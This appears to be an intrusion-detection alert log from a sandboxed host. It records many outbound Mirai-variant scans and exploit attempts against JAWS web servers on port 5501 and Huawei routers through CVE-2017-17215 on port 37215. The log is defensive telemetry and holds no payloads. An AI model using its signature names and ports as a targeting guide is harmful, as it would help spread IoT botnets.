                                              2024-12-13T01:14:56.772221+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359170102.158.0.2185501TCP
                                              2024-12-13T01:14:56.772379+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360250186.81.189.17637215TCP
                                              2024-12-13T01:14:56.772476+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341438186.27.90.24537215TCP
                                              2024-12-13T01:14:56.772633+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340266120.7.216.05501TCP
                                              2024-12-13T01:14:56.772633+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340266120.7.216.05501TCP
                                              2024-12-13T01:14:56.772737+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235042452.12.86.1685501TCP
                                              2024-12-13T01:14:56.772737+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235042452.12.86.1685501TCP
                                              2024-12-13T01:14:56.772834+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235367842.183.34.1425501TCP
                                              2024-12-13T01:14:56.772834+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235367842.183.34.1425501TCP
                                              2024-12-13T01:14:56.773013+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344140207.142.3.1105501TCP
                                              2024-12-13T01:14:56.773013+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344140207.142.3.1105501TCP
                                              2024-12-13T01:14:56.773107+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359858113.100.123.725501TCP
                                              2024-12-13T01:14:56.773107+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359858113.100.123.725501TCP
                                              2024-12-13T01:14:56.773195+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350066186.236.224.10437215TCP
                                              2024-12-13T01:14:56.773299+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235091874.10.112.635501TCP
                                              2024-12-13T01:14:56.773299+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235091874.10.112.635501TCP
                                              2024-12-13T01:14:56.773386+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235103289.126.34.1485501TCP
                                              2024-12-13T01:14:56.773386+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235103289.126.34.1485501TCP
                                              2024-12-13T01:14:56.773488+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233636452.91.248.355501TCP
                                              2024-12-13T01:14:56.773488+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233636452.91.248.355501TCP
                                              2024-12-13T01:14:56.773596+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343406186.161.92.21737215TCP
                                              2024-12-13T01:14:56.773679+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342292186.32.31.2537215TCP
                                              2024-12-13T01:14:56.773823+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342682186.124.8.2937215TCP
                                              2024-12-13T01:14:56.773991+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346390186.126.117.10237215TCP
                                              2024-12-13T01:14:56.774083+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353466186.51.211.8337215TCP
                                              2024-12-13T01:14:56.788158+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335742133.144.61.785501TCP
                                              2024-12-13T01:14:56.788158+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335742133.144.61.785501TCP
                                              2024-12-13T01:14:56.788402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335796198.130.15.2035501TCP
                                              2024-12-13T01:14:56.788402+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335796198.130.15.2035501TCP
                                              2024-12-13T01:14:56.788535+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233803689.95.26.1295501TCP
                                              2024-12-13T01:14:56.788535+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233803689.95.26.1295501TCP
                                              2024-12-13T01:14:56.803551+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354372186.223.22.7337215TCP
                                              2024-12-13T01:14:56.803734+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333158176.166.15.1275501TCP
                                              2024-12-13T01:14:56.803734+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333158176.166.15.1275501TCP
                                              2024-12-13T01:14:56.803753+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347002186.115.76.6437215TCP
                                              2024-12-13T01:14:56.803906+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356832101.7.61.765501TCP
                                              2024-12-13T01:14:56.803906+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356832101.7.61.765501TCP
                                              2024-12-13T01:14:56.804011+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351936186.11.84.19937215TCP
                                              2024-12-13T01:14:56.804123+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358902124.90.72.1875501TCP
                                              2024-12-13T01:14:56.804123+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358902124.90.72.1875501TCP
                                              2024-12-13T01:14:56.804207+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342086161.254.106.585501TCP
                                              2024-12-13T01:14:56.804207+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342086161.254.106.585501TCP
                                              2024-12-13T01:14:56.804321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347092150.111.127.1365501TCP
                                              2024-12-13T01:14:56.804321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347092150.111.127.1365501TCP
                                              2024-12-13T01:14:56.804425+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351030186.226.67.22737215TCP
                                              2024-12-13T01:14:56.804516+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337918186.50.181.16437215TCP
                                              2024-12-13T01:14:56.804615+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333724186.67.55.24737215TCP
                                              2024-12-13T01:14:56.804731+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348696177.135.163.1965501TCP
                                              2024-12-13T01:14:56.804731+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348696177.135.163.1965501TCP
                                              2024-12-13T01:14:56.804842+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351078186.28.140.8237215TCP
                                              2024-12-13T01:14:56.804921+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352482126.5.129.2135501TCP
                                              2024-12-13T01:14:56.804921+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352482126.5.129.2135501TCP
                                              2024-12-13T01:14:56.805069+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353262186.28.37.18737215TCP
                                              2024-12-13T01:14:56.805147+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341698186.152.202.25237215TCP
                                              2024-12-13T01:14:56.805249+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341474186.2.133.16937215TCP
                                              2024-12-13T01:14:56.805397+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354994186.107.132.17037215TCP
                                              2024-12-13T01:14:56.805573+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358880186.180.134.4137215TCP
                                              2024-12-13T01:14:56.805661+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355438186.147.206.11737215TCP
                                              2024-12-13T01:14:56.805748+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337042152.211.76.2235501TCP
                                              2024-12-13T01:14:56.805748+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337042152.211.76.2235501TCP
                                              2024-12-13T01:14:56.805853+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344840186.46.246.24837215TCP
                                              2024-12-13T01:14:56.805933+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345482131.221.215.965501TCP
                                              2024-12-13T01:14:56.805933+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345482131.221.215.965501TCP
                                              2024-12-13T01:14:56.806041+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343458186.252.183.11537215TCP
                                              2024-12-13T01:14:56.806181+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340146186.178.208.10037215TCP
                                              2024-12-13T01:14:56.806189+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234251023.39.211.935501TCP
                                              2024-12-13T01:14:56.806189+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234251023.39.211.935501TCP
                                              2024-12-13T01:14:56.835082+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345154156.79.22.11237215TCP
                                              2024-12-13T01:14:56.852481+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346762156.42.155.10737215TCP
                                              2024-12-13T01:14:56.944313+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342468156.38.111.8837215TCP
                                              2024-12-13T01:14:56.991475+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351126156.57.135.537215TCP
                                              2024-12-13T01:14:57.022612+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337628156.145.177.2637215TCP
                                              2024-12-13T01:14:57.038295+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345370156.188.75.20537215TCP
                                              2024-12-13T01:14:57.038295+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343972156.239.57.11637215TCP
                                              2024-12-13T01:14:57.053661+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352516156.250.170.15637215TCP
                                              2024-12-13T01:14:57.054043+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360012156.100.45.13137215TCP
                                              2024-12-13T01:14:57.100564+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356974156.163.43.20237215TCP
                                              2024-12-13T01:14:57.225710+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348612156.247.168.20437215TCP
                                              2024-12-13T01:14:57.225753+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356338156.165.75.19537215TCP
                                              2024-12-13T01:14:57.288074+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357308156.164.40.1737215TCP
                                              2024-12-13T01:14:57.288183+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337314156.50.119.11637215TCP
                                              2024-12-13T01:14:57.303749+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345312156.207.105.19037215TCP
                                              2024-12-13T01:14:57.303834+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341032156.249.55.5237215TCP
                                              2024-12-13T01:14:57.866419+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347208156.248.4.17237215TCP
                                              2024-12-13T01:14:57.882039+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352114156.62.234.24637215TCP
                                              2024-12-13T01:14:57.882144+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356046156.11.228.15737215TCP
                                              2024-12-13T01:14:57.882144+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346902156.35.226.20537215TCP
                                              2024-12-13T01:14:57.882147+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347936156.136.201.24737215TCP
                                              2024-12-13T01:14:57.882190+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358970156.127.77.13037215TCP
                                              2024-12-13T01:14:57.882324+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348364156.190.204.22437215TCP
                                              2024-12-13T01:14:57.882410+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344112156.76.146.22337215TCP
                                              2024-12-13T01:14:57.897477+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357564156.58.113.20637215TCP
                                              2024-12-13T01:14:57.897674+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358176156.194.105.23937215TCP
                                              2024-12-13T01:14:57.897678+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338838156.244.210.16637215TCP
                                              2024-12-13T01:14:57.897749+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342836156.235.105.8537215TCP
                                              2024-12-13T01:14:57.897831+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340884156.99.218.22137215TCP
                                              2024-12-13T01:14:57.897917+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341720156.150.45.18737215TCP
                                              2024-12-13T01:14:57.913035+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357746156.233.137.7437215TCP
                                              2024-12-13T01:14:57.913203+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356358156.165.4.14337215TCP
                                              2024-12-13T01:14:58.116520+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343132190.54.138.21637215TCP
                                              2024-12-13T01:14:58.147437+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355652190.51.226.1437215TCP
                                              2024-12-13T01:15:00.054569+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346242144.103.158.2195501TCP
                                              2024-12-13T01:15:00.054569+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346242144.103.158.2195501TCP
                                              2024-12-13T01:15:00.100536+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341292157.247.228.1215501TCP
                                              2024-12-13T01:15:00.100536+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341292157.247.228.1215501TCP
                                              2024-12-13T01:15:00.100738+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357340157.251.244.16737215TCP
                                              2024-12-13T01:15:00.100872+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233922694.147.93.255501TCP
                                              2024-12-13T01:15:00.100872+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233922694.147.93.255501TCP
                                              2024-12-13T01:15:00.116214+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335616160.237.248.1405501TCP
                                              2024-12-13T01:15:00.116214+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335616160.237.248.1405501TCP
                                              2024-12-13T01:15:00.131989+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355176106.119.26.165501TCP
                                              2024-12-13T01:15:00.131989+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355176106.119.26.165501TCP
                                              2024-12-13T01:15:00.147471+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233363464.159.55.265501TCP
                                              2024-12-13T01:15:00.147471+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233363464.159.55.265501TCP
                                              2024-12-13T01:15:00.163172+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235067699.78.204.1405501TCP
                                              2024-12-13T01:15:00.163172+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235067699.78.204.1405501TCP
                                              2024-12-13T01:15:00.194480+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351108209.47.138.2215501TCP
                                              2024-12-13T01:15:00.194480+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351108209.47.138.2215501TCP
                                              2024-12-13T01:15:00.210136+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234061693.77.76.1665501TCP
                                              2024-12-13T01:15:00.210136+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234061693.77.76.1665501TCP
                                              2024-12-13T01:15:00.210267+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343446122.250.210.2325501TCP
                                              2024-12-13T01:15:00.210267+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343446122.250.210.2325501TCP
                                              2024-12-13T01:15:00.210318+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235078836.208.171.1745501TCP
                                              2024-12-13T01:15:00.210318+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235078836.208.171.1745501TCP
                                              2024-12-13T01:15:00.210776+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359938141.213.202.485501TCP
                                              2024-12-13T01:15:00.210776+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359938141.213.202.485501TCP
                                              2024-12-13T01:15:00.227095+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353614219.219.30.915501TCP
                                              2024-12-13T01:15:00.227095+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353614219.219.30.915501TCP
                                              2024-12-13T01:15:00.227195+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339174152.100.121.2015501TCP
                                              2024-12-13T01:15:00.227195+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339174152.100.121.2015501TCP
                                              2024-12-13T01:15:00.227196+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236093490.237.45.915501TCP
                                              2024-12-13T01:15:00.227196+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236093490.237.45.915501TCP
                                              2024-12-13T01:15:00.256986+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337294118.232.62.305501TCP
                                              2024-12-13T01:15:00.256986+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337294118.232.62.305501TCP
                                              2024-12-13T01:15:00.257138+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346820115.111.202.275501TCP
                                              2024-12-13T01:15:00.257138+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346820115.111.202.275501TCP
                                              2024-12-13T01:15:00.257221+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234493277.55.69.45501TCP
                                              2024-12-13T01:15:00.257221+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234493277.55.69.45501TCP
                                              2024-12-13T01:15:00.272538+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234621262.96.196.845501TCP
                                              2024-12-13T01:15:00.272538+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234621262.96.196.845501TCP
                                              2024-12-13T01:15:01.069739+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234004427.79.219.2475501TCP
                                              2024-12-13T01:15:01.069739+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234004427.79.219.2475501TCP
                                              2024-12-13T01:15:01.085836+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343780154.92.145.2175501TCP
                                              2024-12-13T01:15:01.085836+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343780154.92.145.2175501TCP
                                              2024-12-13T01:15:01.101182+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353956142.11.131.1095501TCP
                                              2024-12-13T01:15:01.101182+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353956142.11.131.1095501TCP
                                              2024-12-13T01:15:01.101240+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358688114.134.25.2235501TCP
                                              2024-12-13T01:15:01.101240+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358688114.134.25.2235501TCP
                                              2024-12-13T01:15:01.101249+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233595460.20.174.1725501TCP
                                              2024-12-13T01:15:01.101249+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233595460.20.174.1725501TCP
                                              2024-12-13T01:15:01.101276+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348788220.88.243.695501TCP
                                              2024-12-13T01:15:01.101276+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348788220.88.243.695501TCP
                                              2024-12-13T01:15:01.101585+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336618150.113.165.165501TCP
                                              2024-12-13T01:15:01.101585+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336618150.113.165.165501TCP
                                              2024-12-13T01:15:01.102216+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359342185.79.179.2175501TCP
                                              2024-12-13T01:15:01.102216+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359342185.79.179.2175501TCP
                                              2024-12-13T01:15:01.149784+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360900216.67.24.2305501TCP
                                              2024-12-13T01:15:01.149784+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360900216.67.24.2305501TCP
                                              2024-12-13T01:15:01.319534+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23596322.212.43.1385501TCP
                                              2024-12-13T01:15:01.319534+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23596322.212.43.1385501TCP
                                              2024-12-13T01:15:02.304094+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348214176.101.204.665501TCP
                                              2024-12-13T01:15:02.304094+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348214176.101.204.665501TCP
                                              2024-12-13T01:15:02.554733+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345892165.253.80.265501TCP
                                              2024-12-13T01:15:02.554733+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345892165.253.80.265501TCP
                                              2024-12-13T01:15:02.554735+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233695823.217.76.1855501TCP
                                              2024-12-13T01:15:02.554735+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233695823.217.76.1855501TCP
                                              2024-12-13T01:15:02.819611+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332826104.93.24.1725501TCP
                                              2024-12-13T01:15:02.819611+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332826104.93.24.1725501TCP
                                              2024-12-13T01:15:02.819615+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235395617.240.133.1785501TCP
                                              2024-12-13T01:15:02.819615+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235395617.240.133.1785501TCP
                                              2024-12-13T01:15:02.835061+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235579447.88.154.1165501TCP
                                              2024-12-13T01:15:02.835061+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235579447.88.154.1165501TCP
                                              2024-12-13T01:15:02.835143+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353862148.211.229.2385501TCP
                                              2024-12-13T01:15:02.835143+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353862148.211.229.2385501TCP
                                              2024-12-13T01:15:02.835322+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348894143.116.107.685501TCP
                                              2024-12-13T01:15:02.835322+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348894143.116.107.685501TCP
                                              2024-12-13T01:15:03.163493+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335354217.109.131.1865501TCP
                                              2024-12-13T01:15:03.163493+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335354217.109.131.1865501TCP
                                              2024-12-13T01:15:03.257328+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357336222.207.27.135501TCP
                                              2024-12-13T01:15:03.257328+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357336222.207.27.135501TCP
                                              2024-12-13T01:15:03.601608+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233703690.5.134.1995501TCP
                                              2024-12-13T01:15:03.601608+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233703690.5.134.1995501TCP
                                              2024-12-13T01:15:03.852693+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355998122.6.43.305501TCP
                                              2024-12-13T01:15:03.852693+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355998122.6.43.305501TCP
                                              2024-12-13T01:15:05.022806+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234076423.172.41.1655501TCP
                                              2024-12-13T01:15:05.022806+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234076423.172.41.1655501TCP
                                              2024-12-13T01:15:05.382111+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346586197.203.157.6837215TCP
                                              2024-12-13T01:15:05.475926+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340496156.21.203.5637215TCP
                                              2024-12-13T01:15:06.038296+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351140182.7.112.1935501TCP
                                              2024-12-13T01:15:06.038296+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351140182.7.112.1935501TCP
                                              2024-12-13T01:15:06.038304+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356150100.24.234.2195501TCP
                                              2024-12-13T01:15:06.038304+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356150100.24.234.2195501TCP
                                              2024-12-13T01:15:06.038427+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332850209.67.99.1825501TCP
                                              2024-12-13T01:15:06.038427+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332850209.67.99.1825501TCP
                                              2024-12-13T01:15:06.038536+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234553041.119.102.115501TCP
